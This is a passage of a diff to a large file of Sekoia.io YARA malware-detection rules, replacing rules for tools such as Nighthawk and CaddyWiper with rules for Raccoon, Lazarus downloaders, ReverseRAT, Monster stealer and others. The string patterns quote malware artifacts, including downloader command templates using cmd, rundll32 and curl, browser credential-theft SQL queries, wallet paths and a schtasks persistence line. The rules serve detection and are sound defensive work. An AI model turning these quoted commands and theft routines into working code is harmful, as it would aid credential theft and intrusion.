-		$ = "[+] [NotifyRountines]" wide
-		$ = "[callback addr: 0x" wide
-		$ = "EDR / security products driver(s)" wide
-		$ = "Object callback offsets not loaded ! Aborting..." wide
-		$ = "No more space to store object callbacks !!" wide
+		$s1 = "B.symtab" ascii
+		$s2 = "github.com/Ne0nd0g/merlin" ascii
+		$s3 = "github.com/lucas-clemente" ascii
+		$s4 = "SendMerlinMessage" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "07b5472d347d42780469fb2654b7fc54" ) and all of them and $s1 at 591 and filesize < 15MB
 }
-
-rule SEKOIA_Rat_Win_Nighthawk : FILE
+rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
 {
 	meta:
-		description = "Detects Nighthawk RAT"
+		description = "Detect Raccoon based on specific strings"
 		author = "Sekoia.io"
-		id = "91bc3c5b-83fd-47f8-9652-df0f6a70b693"
-		date = "2022-11-23"
+		id = "2148636e-47c7-4bf2-8d1e-df68faf65111"
+		date = "2022-10-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_nighthawk.yar#L3-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_raccoon_str_takemypainback.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9a0c72de5b097f74d3c44586b8355c410470992f37d9a09c5f6db36ad6286d70"
+		logic_hash = "50d30828dab7e197619eeac4ebd2ab6692a9ac40a5091e23642cd1bdde8e9910"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
-		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
-		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
-		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
+		$str0 = "\\ffcookies.txt" wide
+		$str1 = "TakeMyPainBack" wide
+		$str2 = "wallet.dat" wide
+		$str3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$str4 = "Network\\Cookies" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( ( 1 of them ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
+rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Downloader : FILE
 {
 	meta:
-		description = "Detects control flow obfuscation used by TA410 in XXXModule_dlcore0"
+		description = "Detects VHD ransomware downloader"
 		author = "Sekoia.io"
-		id = "2a784f9b-3624-4c5d-8a64-db7d3c33a8f7"
-		date = "2022-10-11"
+		id = "edcc9df8-650c-437a-adb8-a671e8b75e64"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ta410_control_flow_obfuscation.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_vhd_ransomware_downloader.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "6cf78943728286d0bddd99049d81065673ab7f679029cdd5f5dc69f90197136e"
-		logic_hash = "3ee6ee07e7a7be285290ec91de649afff3e5dc222bcfc58709b642d4dd53dc41"
+		logic_hash = "042ab0029d170937af9b9ee6a8e499843532c84cf99faed3d2d47cb18a1500ac"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237501,30 +237489,27 @@ rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        E8 ?? ?? ?? ??
-        83 C0 10
-        3D 00 00 00 80
-        7D 01
-        EB ff
-        }
-		$chunk_2 = {83 C0 10 3D 00 00 00 80 7d 01 eb ff e0 50 c3 75}
+		$ = "rundll32.exe %s #1 %S" wide
+		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
+		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
+		$ = "curl -A cur1-agent -L %s -s -d da"
+		$ = "curl -A cur1-agent -L %s -s -d dl"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of them
+		filesize < 2MB and 3 of them
 }
-rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
+rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
 {
 	meta:
-		description = "Detects LuckyMouse RShell Mach-O implant"
+		description = "Detects SideCopy's ReverseRAT"
 		author = "Sekoia.io"
-		id = "89f18013-ea3e-440f-821e-cef102a43b7b"
-		date = "2022-08-05"
+		id = "383397c9-fd4a-4255-a8f2-27683bdbb7f7"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_rshell_strings.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_reverserat_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ffca47856d4c4d83312220cff23c0a556be0e675d59ac009c2f74fc0e39cb816"
+		logic_hash = "be657405b5703dc402b53350aa7ef18529bda3dc44c759585c4cfa1bc1eb76ff"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237532,114 +237517,71 @@ rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 64 69 72 00 70 61 74 68
-        00 64 6F 77 6E 00 72 65
-        61 64 00 75 70 6C 6F 61
-        64 00 77 72 69 74 65 00
-        64 65 6C }
-		$ = { 6C 6F 67 69 6E 00 68 6F
-        73 74 6E 61 6D 65 00 6C
-        61 6E 00 75 73 65 72 6E
-        61 6D 65 00 76 65 72 73
-        69 6F 6E }
+		$ = "downloadexe" wide
+		$ = "creatdir" wide
+		$ = "regnewkey" wide
+		$ = "reglist" wide
+		$ = "regdelkey" wide
+		$ = "clipboardset" wide
+		$ = "shellexec" wide
+		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
 
 	condition:
-		( uint32be( 0 ) == 0xCFFAEDFE or uint16be( 0 ) == 0x4d5a ) and filesize < 300KB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Wiper_Win_Caddywiper : FILE
+rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
 {
 	meta:
-		description = "Detect CaddyWiper"
+		description = "Finds Monster Stealer stub (Python payload) based on specific strings."
 		author = "Sekoia.io"
-		id = "869d44ff-79fc-403d-a45d-d33712da5bd0"
-		date = "2022-03-15"
+		id = "10d27d49-79ae-4edc-8c30-35506bdf2c42"
+		date = "2024-08-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_caddywiper.yar#L4-L37"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_monster_stub.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "01a9910b42f402398bbe84546074256f56b10fe0f8524a9a9723aebe43b26a14"
+		logic_hash = "d6362c54b1f56ffa878423fbb1a3f57508d20e06b573c732f892494178a49200"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1_upx = "b66b179eac03afafdc69f62c207819eceecfbf994c9efa464fda0d2ba44fe2d7"
-		hash1 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
-		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
 
 	strings:
-		$ = "NETAPI32.dll" ascii
-		$ = "DsRoleGetPrimaryDomainInformation" ascii
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 5KB and filesize < 20KB and pe.number_of_sections == 3 and pe.number_of_resources == 0 and all of them or pe.imphash ( ) == "ea8609d4dad999f73ec4b6f8e7b28e55" or pe.imphash ( ) == "bae2d138abe43164fb5e95f313de3d14" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f0d4c11521fc3891965534e6c52e128b" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6be6e878d1e8fed277c5feaf60b57a19" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "11f22fc72c3ca7dd6b874bda37c1fe82" )
-}
-
-rule SEKOIA_Stealer_Win_Luca : FILE
-{
-	meta:
-		description = "Detect Luca stealer. Open source Rust stealer."
-		author = "Sekoia.io"
-		id = "d2cc1442-0ba5-4e81-9fea-e9e078903eed"
-		date = "2022-07-26"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_luca.yar#L3-L49"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3694db49d84f92c70c51e4fe6f126fd56b3d7d8ed26619137fd55b0adb97865e"
-		score = 75
-		quality = 78
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "cookies"
-		$ = "creditcards"
-		$ = "/Default/Network/CookiesUser Data/Default/Network/Cookies_cookies"
-		$ = "/Default/Web DataUser Data/Default/Web Data_webdata"
-		$ = "SELECT action_url, username_value, password_value FROM loginsSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cardsSELECT host_key, name, encrypted_value, path, expires_utc, is_secure FROM cookiesLOCALAPPDATA"
-		$ = "\\logsxc\\passwords_.txt"
-		$ = " Name:"
-		$ = "User: "
-		$ = "Installed Languages:  "
-		$ = "Operating System: "
-		$ = "Used/Installed RAM:  GB "
-		$ = "Cores available: "
-		$ = "\\screen-.png"
-		$ = "Username: "
-		$ = "Computer name: "
-		$ = "OS: "
-		$ = "Language: "
-		$ = "Hostname: "
-		$ = "=> networks: B"
-		$ = "=> system:total memory:  KB"
-		$ = "used memory : "
-		$ = "total swap  : "
-		$ = "used swap   : "
-		$ = "NB CPUs: "
-		$ = "Passwords: "
-		$ = "Wallets: "
-		$ = "Files: "
-		$ = "Credit Cards: "
-		$ = "sensfiles.zip"
+		$str01 = "https://t.me/monster_free_cloud" ascii
+		$str02 = "MonsterUpdateService" ascii
+		$str03 = "Monster.exe" ascii
+		$str04 = "schtasks /create /f /sc daily /ri 30 /tn" ascii
+		$str05 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\" ascii
+		$str06 = "banned_uuids" ascii
+		$str07 = "banned_computer_names" ascii
+		$str08 = "banned_process" ascii
+		$str09 = "register_X_browsers" ascii
+		$str10 = "register_payload" ascii
+		$str11 = "tiktok_sessions.txt" ascii
+		$str12 = "spotify_sessions.txt" ascii
+		$str13 = "network_info.txt" ascii
+		$str14 = "lolz.guru" ascii
+		$str15 = "echo ####System Info####" ascii
+		$str16 = "echo ####Firewallinfo####" ascii
+		$str17 = "/injection/main/injection.js" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 4000KB and pe.rich_signature.toolid ( 0 , 0 ) and pe.number_of_resources == 0 and 15 of them
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
+
+rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
 {
 	meta:
-		description = "Finds BlackGuard samples based on specific strings (March 2023, version 5)"
+		description = "Invalid printer loader detection based on the XOR key"
 		author = "Sekoia.io"
-		id = "65804d31-2a0c-4b22-a8d9-8cbe1497f155"
-		date = "2023-03-27"
+		id = "6dd3046d-55fb-4bcc-8735-dbc0add4d570"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blackguard_mar23.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/in2al5d_p3in4er_loader.yar#L3-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "63d77808036478da0c8d38a6d3581ccd2d4e46ae16ec9e817f09f8b633b01843"
+		logic_hash = "fb7dadcd1e87c15cacfc046e76648b1fa29f1bce44fa0314b84746ca57eebaed"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237647,61 +237589,51 @@ rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "==================  5.0 ==============" wide
-		$str02 = "/concerts/disk.php" wide
-		$str03 = "/concerts/memory.php" wide
-		$str04 = "/loader_v2.txt" wide
-		$str05 = "io.solarwallet.app\\Local Storage\\leveldb" wide
-		$str06 = "costura.dotnetzip.dll.compressed" ascii wide
-		$str07 = "set_Laskakakaska" ascii
-		$str08 = "get_Yliana" ascii
-		$str09 = "set_Illeona" ascii
-		$str10 = "set_Gyttettfd" ascii
+		$xor_key = "in2al5d p3in4er" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		all of them and ( filesize > 4MB and filesize < 7MB ) and pe.is_pe
 }
-
-rule SEKOIA_Apt_Win_Disabledefender
+rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
 {
 	meta:
-		description = "detects strings and imphash"
+		description = "Detects a Generic Downloader used by Lazarus"
 		author = "Sekoia.io"
-		id = "a7b124ab-4c9d-47c0-a59e-211cc713b9b3"
-		date = "2022-09-23"
+		id = "eb0f0a91-5e72-4358-91a3-7c3f94702fa7"
+		date = "2022-08-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_win_disabledefender.yar#L3-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rule_lazarus_generic_downloader_7c3f94702fa7.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3b8c8d9144d9f97ee053c7cefc30d3920940bc33efcd1d7f5c61666217ef7896"
+		logic_hash = "1ee58eb760fb74ef089f7d3eb423f314fe1c22e8c85b01eba0e965dea8c846ce"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Restarting with privileges"
-		$ = "Windows defender is currently ACTIVE"
-		$ = "Windows defender is currently OFF"
-		$ = "Disabled windows defender"
-		$ = "Failed to disable defender..."
+		$ = "%s%s%s%s = %s%s%s%s"
+		$ = "sec-ch-ua-mobile: ?0"
+		$ = "%s>%s"
+		$ = "d$f92&^$#FESAfaSDage#FDa"
+		$ = "Sec-Fetch-User: ?1"
 
 	condition:
-		4 of them or pe.imphash ( ) == "74a6ef9e7b49c71341e439022f643c8e"
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
-rule SEKOIA_Strongpity_Malware : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
 {
 	meta:
-		description = "Detects obfuscation used by StrongPity"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "f19a685c-599d-42cf-a5d8-7a2375102f97"
-		date = "2024-02-26"
+		id = "e4283d6e-d829-4f21-ba60-9e6232519e54"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/strongpity_malware.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_9.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "14be5eccb4e754d6dad69cda51a924241cc75f5d758bc2d746acfe41e1684b3a"
+		logic_hash = "deb0773e6300ed0f4c099359731812216390017eaf8de678b2a5ed237906f03f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237709,25 +237641,25 @@ rule SEKOIA_Strongpity_Malware : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rand_edi = {E8 ?? ?? ?? ??    8B F8 81 E7 07 00 00 80    79 ?? 4F 83 CF F8 47 83 C7 02}
-		$rand_esi = {E8 ?? ?? ?? ?? 8B F0 81 E6 07 00 00 80 79 ?? 4E 83 CE F8 46 83 C6 02}
-		$rand_eax = {E8 ?? ?? ?? ??    25 07 00 00 80 79 ?? 48 83 C8 F8 40 83 C0 02}
+		$ = "shell.Environment(\"Process\").Item(\"COMPLUS_Version\")"
+		$ = "(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)"
+		$ = "DebugPrint Err.Description"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and #rand_edi + #rand_esi + #rand_eax > 20
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
+rule SEKOIA_Ransomware_Win_Fonix : FILE
 {
 	meta:
-		description = "Detects Remote Shell of Mustang Panda by detecting internal structure intialization"
+		description = "Detect the Fonix / XINOF ransomware by spotting its specific debug path"
 		author = "Sekoia.io"
-		id = "cffdd11e-9700-462e-a965-f9f51db63f0b"
-		date = "2022-12-06"
+		id = "b28467d5-69a0-4a8b-8938-8fdac2ae8d19"
+		date = "2021-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_windows_remoteshell.yar#L1-L121"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_fonix.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4a72ae1574022d6454e29a6b05a0279f2e774f8218d24a3a866721d958c52e1a"
+		logic_hash = "2085fae62c07f63723a417566c204b0a9942de35ed80272d1486dc2c96ca0037"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237735,90 +237667,46 @@ rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        C7 45 ?? 0C 00 00 00
-        8D 4E ??
-        C6 01 03
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        }
-		$chunk_2 = {
-        C7 45 ?? 0C 00 00 00
-        8D 4E ??
-        C6 01 02
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        8B 45 ??
-        83 E8 05
-        50
-        51
-        E8 ?? ?? ?? ??
-        }
-		$chunk_3 = {
-        C7 87 ?? ?? ?? ?? 01 00 00 00
-        8D 4E ??
-        C7 45 ?? 0C 00 00 00
-        C6 01 04
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        8B 45 ??
-        83 E8 05
-        50
-        51
-        E8 ?? ?? ?? ??
-        }
-		$chunk_4 = {
-        83 65 ?? ??
-        EB ??
-        8B 45 ??
-        40
-        89 45 ??
-        8B 45 ??
-        3B 45 ??
-        7D ??
-        8B 45 ??
-        03 45 ??
-        0F B6 08
-        8B 45 ??
-        33 D2
-        6A ??
-        5E
-        F7 F6
-        0F B6 84 15 ?? ?? ?? ??
-        33 C8
-        8B 45 ??
-        03 45 ??
-        88 08
-        EB ??
-        83 65 ?? ??
-        EB ??
-        8B 45 ??
-        40
-        89 45 ??
-        8B 45 ??
-        }
+		$s1 = "Ransomware\\Fonix" ascii
+		$s2 = "Release\\Fonix.pdb" ascii
 
 	condition:
-		filesize < 8MB and 3 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Koi_Powershell_Loading_Obfuscatednet
+
+rule SEKOIA_Implant_Win_Mysterysnail : FILE
 {
 	meta:
-		description = "Powershell script loading obfuscated .NET Koi module"
+		description = "Detect the MysterySnail using section hashes"
 		author = "Sekoia.io"
-		id = "75a7460d-cc28-470e-9841-da8e46ee0101"
-		date = "2024-03-20"
+		id = "dfd2eba8-eb9c-411a-b5e0-663593453e3d"
+		date = "2021-10-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_powershell_loading_obfuscatednet.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_mysterysnail.yar#L4-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "82f30c04474ea77af5169771a2c0e75ba792fd32dc559b8c29172b73ace4ef10"
+		logic_hash = "37c02a5916ad7ce3190ce926d576365d1e17fee0f10e9b31619ea4b6fee29ae6"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "de0c9e6aec27d278ccdb6718b3e96e32" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a41b6fb1cc34d6393e30c13a58f6ecd4" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f263a2be76694feab7e2ce79ecf8b724" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e9056ae96619d7aa18daa973da592afc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3e38e89e9e8329f5cff8a7022d88fff7" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce78f8599167c63e8f1c8d3e789c4a60" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "456d4f1096bf5c72cd6e1e3eb9980ec6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "37e2bff637001fc64566fe651757f66e" ) or hash.md5 ( pe.rich_signature.clear_data ) == "e4116fffa240ba6d91b400541ce85182" )
+}
+rule SEKOIA_Apt_Kimsuky_Sharptongue_C2_Source
+{
+	meta:
+		description = "Detects the PHP code of the SharpTongue C2"
+		author = "Sekoia.io"
+		id = "a2ccf773-511c-4088-8bcf-b923291d024b"
+		date = "2022-07-29"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_c2_source.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "c301a99876cfe2863546c990654aa922f9327e0eb010968eaea43f1d8ced76da"
 		score = 75
 		quality = 80
 		tags = ""
@@ -237826,27 +237714,26 @@ rule SEKOIA_Koi_Powershell_Loading_Obfuscatednet
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "# [Net.ServicePointManager]::SecurityProtocol +='tls12'"
-		$s2 = "$binary[$i] = $binary[$i] -bxor $k[$i % $k.Length]"
-		$s3 = "\").Split('|')"
-		$s4 = "$ep.Invoke($null, "
+		$ = "<?php"
+		$ = "foreach($_GET as $variable => $value)"
+		$ = "$chk=$value"
+		$ = "base64_encode($ip)"
 
 	condition:
-		$s3 and 3 of them
+		all of them
 }
-rule SEKOIA_Apt_Sidecopy_Cheex : FILE
+rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
 {
 	meta:
-		description = "Detects PDB path of Cheex"
+		description = "Detects malicious TOR redirection affecting RDP, NetBios"
 		author = "Sekoia.io"
-		id = "e9b57f15-e703-4367-b501-fa8a873e4455"
-		date = "2024-08-14"
+		id = "1e5c469b-f721-44af-87b3-1adf423719c1"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_cheex.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_tor_hidden_service_leading_to_winports.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "825c7a1603f800ff247c8f3e9a1420af"
-		logic_hash = "e5561466b616c746b33c0c4a46e8bdb0859e55aef8896bc1b14e54838c1661ee"
+		logic_hash = "39db199ba7fede8df4bdb505b071240dda96b74f66f818f90047dad338dc4a72"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237854,49 +237741,80 @@ rule SEKOIA_Apt_Sidecopy_Cheex : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\Users\\Dead Snake\\source\\repos\\cheex" ascii fullword
+		$s1 = "HiddenServiceDir "
+		$s2 = "SocksPort "
+		$s3 = "HiddenServicePort "
+		$s4 = ":3389"
+		$s5 = ":445"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		$s1 and $s2 and ( $s4 in ( @s3 .. @s3 + 100 ) or $s5 in ( @s3 .. @s3 + 100 ) ) and filesize < 2000
 }
-rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor_Obfuscated : FILE
+rule SEKOIA_Apt_Unc4990_Emptyspace_Pyc : FILE
 {
 	meta:
-		description = "Detects obfuscated Muddys manifestation JScript backdoor"
+		description = "Detects Python Bytecode of EmptySpace"
 		author = "Sekoia.io"
-		id = "58df72a1-822c-4b82-904d-1c0124dc7bc1"
-		date = "2022-01-13"
+		id = "d970fd9c-1ce5-471c-96a1-146250f36b89"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_manifestation_backdoor_obfuscated.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_emptyspace_pyc.yar#L1-L43"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8610f0895fafd2bc9a19bbff816754b563565ba6b105cc3d0a32b80bf5ebdc47"
+		logic_hash = "98e9c848f6b6276815b040681d7f36548b367257bb75d133309e89e8572a50b7"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
